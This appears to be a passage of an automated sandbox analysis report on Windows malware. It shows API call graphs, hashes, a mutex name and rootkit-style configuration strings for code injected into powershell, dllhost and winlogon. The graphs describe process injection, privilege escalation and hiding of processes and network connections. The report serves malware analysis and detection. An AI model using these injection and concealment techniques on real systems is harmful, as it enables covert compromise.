                                                                                                            • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction Fuzzy Hash: E421B236A04F4292EBB0DB16A8607BAB396F794BA0F254475DFA943754EF34C487C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001F5FDC72B39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction ID: 562618aa7883cd082c43bd52e2ae7e37aed485c2d46f25089b7071d0b548434d
                                                                                                            • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction Fuzzy Hash: 96217F32700B52C6EBA1DF16B860BAAB3A6F788B44F4444B5DFAA83754EF34C4478740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Stringtry_get_function
                                                                                                            • String ID: LCMapStringEx
                                                                                                            • API String ID: 2588686239-3893581201
                                                                                                            • Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction ID: 0d007a8cd0e22e45df07b9f821e925819e2e4d0a61a055a0ed9739d13fd82984
                                                                                                            • Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                            • Instruction Fuzzy Hash: BA110836608B81C6D760CB16F4506EAB7A6F7C9B90F544126EF9D83B19DF38C5428B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                            • Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction ID: 07bb81dd0229802c5e0b8deacdeeb9a5a994034402def73e0d55cd926585fadb
                                                                                                            • Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                            • Instruction Fuzzy Hash: 17111F32614F4182EB918F25E4506AABBE6F788B94F184661DF9D07764DF39C552C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                            • API String ID: 539475747-3084827643
                                                                                                            • Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                            • Instruction ID: 44443c04ffccbaa36e03058359307d2981676a92abc7f4cb0100d6e7ca33087d
                                                                                                            • Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                            • Instruction Fuzzy Hash: A7F0E235304F41D1EB459B41F460AEA2263FB88B90F4851B2EB7903B19DF38C887C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuetry_get_function
                                                                                                            • String ID: FlsSetValue
                                                                                                            • API String ID: 738293619-3750699315
                                                                                                            • Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                            • Instruction ID: 9f41e21ba2dd951071d147ac1887eaa5f2816e0b68735324138a42238aa5b57e
                                                                                                            • Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                            • Instruction Fuzzy Hash: 95E09271204E43D2EB455B55F820BFA2223BB88B80F4895B6DB3907365EE38C857C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 756756679-0
                                                                                                            • Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                            • Instruction ID: 20633ee71f7fb08b150d792c946d1424cff66b40a7b8f4429150e31046863af7
                                                                                                            • Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                            • Instruction Fuzzy Hash: E1218E33605F91C1EB519F5AE4142EAB3A2FB88FD4F585425DF9D87B24EA78C4438740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1617791916-0
                                                                                                            • Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                            • Instruction ID: 10ac988891f058cb029030192fe840b4d479ef4dbc09f068245be0cf5ad212f6
                                                                                                            • Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                            • Instruction Fuzzy Hash: 60E06D71601A0596F704AF62D8287AA36E2FB8AF02F4CD028CE1947350EF7D849A8740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:68.6%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:39.3%
                                                                                                            Total number of Nodes:61
                                                                                                            Total number of Limit Nodes:5
                                                                                                            execution_graph 226 140001584 227 1400015a6 226->227 228 1400015ae GetTokenInformation 227->228 231 140001613 227->231 229 1400015d0 228->229 228->231 230 1400015ef GetTokenInformation 229->230 229->231 230->231 232 140001f94 235 140001fa1 232->235 234 140001fc1 ConnectNamedPipe 236 140001fef 234->236 235->234 237 14000165c 235->237 239 1400016b1 237->239 238 140001794 238->235 239->238 240 140001754 CreateNamedPipeW 239->240 240->238 241 140001b1c 244 140001b30 241->244 268 140001908 244->268 247 140001908 6 API calls 248 140001be6 247->248 249 140001c8e FindResourceA 248->249 251 140001c21 LookupPrivilegeValueW 248->251 252 140001c85 FindCloseChangeNotification 248->252 250 140001b25 249->250 255 140001cae 249->255 251->252 253 140001c3b AdjustTokenPrivileges 251->253 252->249 253->252 254 140001c7f 253->254 254->252 255->250 279 140001390 255->279 257 140001cf8 RegCreateKeyExW 258 140001e15 CreateThread 257->258 259 140001d3a 257->259 260 140001e3c CreateThread 258->260 261 140001d6e RegSetKeySecurity 259->261 262 140001d8f RegCreateKeyExW 259->262 266 140001e7a SleepEx 260->266 261->262 263 140001e0a 262->263 264 140001dcb RegSetValueExW RegCloseKey 262->264 263->258 264->263 266->266 269 140001911 268->269 274 140001aee 268->274 270 1400019a2 K32GetModuleInformation 269->270 269->274 271 1400019be CreateFileW 270->271 270->274 272 1400019f3 CreateFileMappingW 271->272 271->274 273 140001a1d MapViewOfFile 272->273 272->274 275 140001ae5 FindCloseChangeNotification 273->275 277 140001a41 273->277 274->247 275->274 276 140001a5c lstrcmpi 276->277 278 140001a8d 276->278 277->275 277->276 277->278 278->275 280 1400013ab 279->280 283 14000119c 280->283 282 1400013d4 284 1400011d5 K32EnumProcesses 283->284 286 1400012fc RtlDeleteBoundaryDescriptor 284->286 290 140001229 284->290 289 140001316 RtlDeleteBoundaryDescriptor 286->289 288 14000125b K32EnumProcessModules 288->290 289->282 290->286 290->288 291 1400014ec 294 140001510 291->294 292 140001541 293 140001538 FindCloseChangeNotification 293->292 294->292 294->293 295 140001ed0 297 140001ef1 295->297 296 140001f26 K32EnumProcesses 296->297 297->296

                                                                                                            Callgraph

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create$CloseFileFind$ChangeNotificationThreadValue$AdjustInformationLookupMappingModulePrivilegePrivilegesResourceSecuritySleepTokenViewlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3489061390-0
                                                                                                            • Opcode ID: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
                                                                                                            • Instruction ID: b0e1fb852f6e0543cbb1d0b345f32bc6fd7345078760f1e0bc57de08f7ced3b6
                                                                                                            • Opcode Fuzzy Hash: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
                                                                                                            • Instruction Fuzzy Hash: CF9109B6205B8096EB26CF62F8547DA73A9F78CB94F408125EB4A47B74DF78C549C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BoundaryDeleteDescriptorEnum$ModulesProcessProcesses
                                                                                                            • String ID:
                                                                                                            • API String ID: 330119047-0
                                                                                                            • Opcode ID: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
                                                                                                            • Instruction ID: 722e7c41bd921b01580d5e9fcb7604c5b43dbddabd9dc005843a26f70c2221f1
                                                                                                            • Opcode Fuzzy Hash: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
                                                                                                            • Instruction Fuzzy Hash: 6B5189B2711A809AEB66CF63A848BEA22A5F78DBC4F444025EF4A47768DF38C555C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 105 14000165c-1400016b3 107 140001794 105->107 108 1400016b9-1400016c1 105->108 109 140001798-1400017aa 107->109 110 1400016c4-1400016da 108->110 110->110 111 1400016dc-140001714 110->111 111->107 113 140001716-140001728 111->113 113->107 115 14000172a-14000173a 113->115 115->107 117 14000173c-140001752 115->117 117->107 119 140001754-140001792 CreateNamedPipeW 117->119 119->109
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateNamedPipe
                                                                                                            • String ID:
                                                                                                            • API String ID: 2489174969-0
                                                                                                            • Opcode ID: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
                                                                                                            • Instruction ID: 5e84f6bf4889631b23437abf526e9bdf5af4b3ca6bd4e12e17f1e2086ffe5991
                                                                                                            • Opcode Fuzzy Hash: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
                                                                                                            • Instruction Fuzzy Hash: 7B414BB2615B50CAE761CF25E4807DD77B4F788B98F44522AFB4943BA8EB78C548CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Create$ChangeCloseFindInformationMappingModuleNotificationViewlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 910215268-0
                                                                                                            • Opcode ID: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
                                                                                                            • Instruction ID: f2b1c273cdc5545e6e8c12de746a27ba9334337610d31b556cae7d200a6f3496
                                                                                                            • Opcode Fuzzy Hash: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
                                                                                                            • Instruction Fuzzy Hash: 3B5139B6305A8192EB22DF16B458BDA73A9FB8DBD8F044125EF4A037A4DF38C549C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 91 140001584-1400015a8 93 140001647-140001658 91->93 94 1400015ae-1400015ce GetTokenInformation 91->94 95 14000163c 94->95 96 1400015d0-1400015d9 94->96 95->93 96->95 98 1400015db-1400015ed 96->98 98->95 100 1400015ef-140001611 GetTokenInformation 98->100 101 140001633 100->101 102 140001613-140001631 100->102 101->95 102->101
                                                                                                            APIs
                                                                                                            • GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 00000001400015C6
                                                                                                            • GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 0000000140001609
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 4114910276-0
                                                                                                            • Opcode ID: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
                                                                                                            • Instruction ID: 2eae3c48201e6f103262f764e10c79d14b5d21d5893c39f3542a132d265f3134
                                                                                                            • Opcode Fuzzy Hash: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
                                                                                                            • Instruction Fuzzy Hash: B52139B6204A8082EB12CF62F85479AB764FBCCBD4F448525EB8947B78DF79C545CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 120 140001ed0-140001f24 125 140001f26-140001f39 K32EnumProcesses 120->125 126 140001f86-140001f8f 125->126 127 140001f3b-140001f4a 125->127 126->125 128 140001f74-140001f82 call 140001450 127->128 129 140001f4c-140001f50 127->129 128->126 131 140001f52 129->131 132 140001f63-140001f66 call 140001eb0 129->132 134 140001f56-140001f5b 131->134 138 140001f6a 132->138 136 140001f5d-140001f61 134->136 137 140001f6e-140001f72 134->137 136->132 136->134 137->128 137->129 138->137
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumProcesses
                                                                                                            • String ID:
                                                                                                            • API String ID: 84517404-0
                                                                                                            • Opcode ID: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
                                                                                                            • Instruction ID: 3e335d43075e719169e469211f82513eafd9eb7e81d155af191f1dae7c0dcdef
                                                                                                            • Opcode Fuzzy Hash: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
                                                                                                            • Instruction Fuzzy Hash: F2214AB6605A129BE716CF17B4547EAB6A6F7C9BD1F144028EB4607A78CF39D440CA40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 140 1400014ec-140001516 142 140001541-140001552 140->142 143 140001518-140001528 140->143 145 140001538-14000153b FindCloseChangeNotification 143->145 146 14000152a-140001533 143->146 145->142 146->145
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,000000014000103E), ref: 000000014000153B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
                                                                                                            • Instruction ID: 44c5bdf9c31fdf4bd35f48c43806700b171b0c8e6473a7c39bf54194b38a2f46
                                                                                                            • Opcode Fuzzy Hash: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
                                                                                                            • Instruction Fuzzy Hash: D2F03071705B8183EB16CF57B98439A6661E78CBC1F489139FB8A43768DF38C485C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 147 140001f94-140001f9e 148 140001fa1-140001fb4 call 14000165c 147->148 151 140001fc1-140001fe6 ConnectNamedPipe 148->151 152 140001fb6-140001fbf 148->152 154 140001fef 151->154 152->148
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NamedPipe$ConnectCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2149227607-0
                                                                                                            • Opcode ID: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
                                                                                                            • Instruction ID: 32f579bea11482fe29c7866e40561744ab130bf1df4bedb027ae58d6efce7050
                                                                                                            • Opcode Fuzzy Hash: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
                                                                                                            • Instruction Fuzzy Hash: 5AF058B1204B4591EB16DF23F8143EA63A4AB8CBE0F588324BB6A436F4DF38C508C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:0.7%
                                                                                                            Dynamic/Decrypted Code Coverage:93.8%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:97
                                                                                                            Total number of Limit Nodes:21
                                                                                                            execution_graph 50653 2d0166129a0 50654 2d0166129ce 50653->50654 50655 2d016612a2c VirtualAlloc 50654->50655 50656 2d016612a50 50654->50656 50655->50656 50661 2d0165e56cd 50663 2d0165e56d4 50661->50663 50662 2d0165e573b 50663->50662 50664 2d0165e57b7 VirtualProtect 50663->50664 50665 2d0165e57e3 GetLastError 50664->50665 50666 2d0165e57f1 50664->50666 50665->50666 50667 2d0165e1c28 50672 2d0165e1650 GetProcessHeap HeapAlloc 50667->50672 50669 2d0165e1c3e Sleep SleepEx 50670 2d0165e1c37 50669->50670 50670->50669 50671 2d0165e15c0 StrCmpIW StrCmpW 50670->50671 50671->50670 50716 2d0165e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 50672->50716 50674 2d0165e1678 50717 2d0165e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 50674->50717 50676 2d0165e1689 50718 2d0165e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 50676->50718 50678 2d0165e1692 50719 2d0165e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 50678->50719 50680 2d0165e169b 50681 2d0165e16b6 RegOpenKeyExW 50680->50681 50682 2d0165e18ce 50681->50682 50683 2d0165e16e8 RegOpenKeyExW 50681->50683 50682->50670 50684 2d0165e1727 RegOpenKeyExW 50683->50684 50685 2d0165e1711 50683->50685 50687 2d0165e174b 50684->50687 50688 2d0165e1762 RegOpenKeyExW 50684->50688 50720 2d0165e12c8 16 API calls 50685->50720 50721 2d0165e104c 6 API calls 50687->50721 50689 2d0165e179d RegOpenKeyExW 50688->50689 50690 2d0165e1786 50688->50690 50694 2d0165e17d8 RegOpenKeyExW 50689->50694 50695 2d0165e17c1 50689->50695 50722 2d0165e12c8 16 API calls 50690->50722 50691 2d0165e171d RegCloseKey 50691->50684 50699 2d0165e17fc 50694->50699 50700 2d0165e1813 RegOpenKeyExW 50694->50700 50723 2d0165e12c8 16 API calls 50695->50723 50696 2d0165e1758 RegCloseKey 50696->50688 50697 2d0165e1793 RegCloseKey 50697->50689 50724 2d0165e12c8 16 API calls 50699->50724 50703 2d0165e184e RegOpenKeyExW 50700->50703 50704 2d0165e1837 50700->50704 50701 2d0165e17ce RegCloseKey 50701->50694 50705 2d0165e1889 RegOpenKeyExW 50703->50705 50706 2d0165e1872 50703->50706 50725 2d0165e104c 6 API calls 50704->50725 50710 2d0165e18ad 50705->50710 50711 2d0165e18c4 RegCloseKey 50705->50711 50726 2d0165e104c 6 API calls 50706->50726 50707 2d0165e1809 RegCloseKey 50707->50700 50727 2d0165e104c 6 API calls 50710->50727 50711->50682 50712 2d0165e1844 RegCloseKey 50712->50703 50713 2d0165e187f RegCloseKey 50713->50705 50715 2d0165e18ba RegCloseKey 50715->50711 50716->50674 50717->50676 50718->50678 50719->50680 50720->50691 50721->50696 50722->50697 50723->50701 50724->50707 50725->50712 50726->50713 50727->50715 50728 2d0165e3c39 50732 2d0165e3b86 50728->50732 50729 2d0165e3bf0 50730 2d0165e3bd6 VirtualQuery 50730->50729 50730->50732 50731 2d0165e3c0a VirtualAlloc 50731->50729 50733 2d0165e3c3b GetLastError 50731->50733 50732->50729 50732->50730 50732->50731 50733->50729 50733->50732 50738 2d0165829a0 50739 2d0165829ce 50738->50739 50740 2d016582a2c VirtualAlloc 50739->50740 50741 2d016582b3f 50739->50741 50740->50741 50743 2d016582a50 50740->50743 50742 2d016582ac3 LoadLibraryA 50742->50743 50743->50741 50743->50742 50748 2d0165e2af4 50755 2d0165fecd0 50748->50755 50750 2d0165e2b39 OpenMutexW 50751 2d0165e2bba 50750->50751 50752 2d0165e2b54 CloseHandle 50750->50752 50752->50751 50753 2d0165e2b61 50752->50753 50753->50751 50754 2d0165e39d0 StrCmpNIW 50753->50754 50754->50753 50756 2d0165fecd2 50755->50756 50761 2d0165e5e70 50762 2d0165e5e7d 50761->50762 50763 2d0165e5e89 50762->50763 50770 2d0165e5f9a 50762->50770 50764 2d0165e5ebe 50763->50764 50765 2d0165e5f0d 50763->50765 50766 2d0165e5ee6 SetThreadContext 50764->50766 50766->50765 50767 2d0165e607e 50769 2d0165e609e 50767->50769 50781 2d0165e4560 VirtualFree 50767->50781 50768 2d0165e5fc1 VirtualProtect FlushInstructionCache 50768->50770 50777 2d0165e4f70 GetCurrentProcess 50769->50777 50770->50767 50770->50768 50773 2d0165e60a3 50774 2d0165e60b7 ResumeThread 50773->50774 50776 2d0165e60f7 _handle_error 50773->50776 50775 2d0165e60eb 50774->50775 50775->50773 50778 2d0165e4f8c 50777->50778 50779 2d0165e4fa2 VirtualProtect FlushInstructionCache 50778->50779 50780 2d0165e4fd3 50778->50780 50779->50778 50780->50773 50781->50769

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000002D0165E2B39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction ID: c27e23a338ee93dc7580a733701f16d5e42c596999dd7a57b408f4815b780adb
                                                                                                            • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction Fuzzy Hash: 38214132B0078485EB60DF96FC8871AB799F788B84F858066DE8D83768EF35CD468744
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                            • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
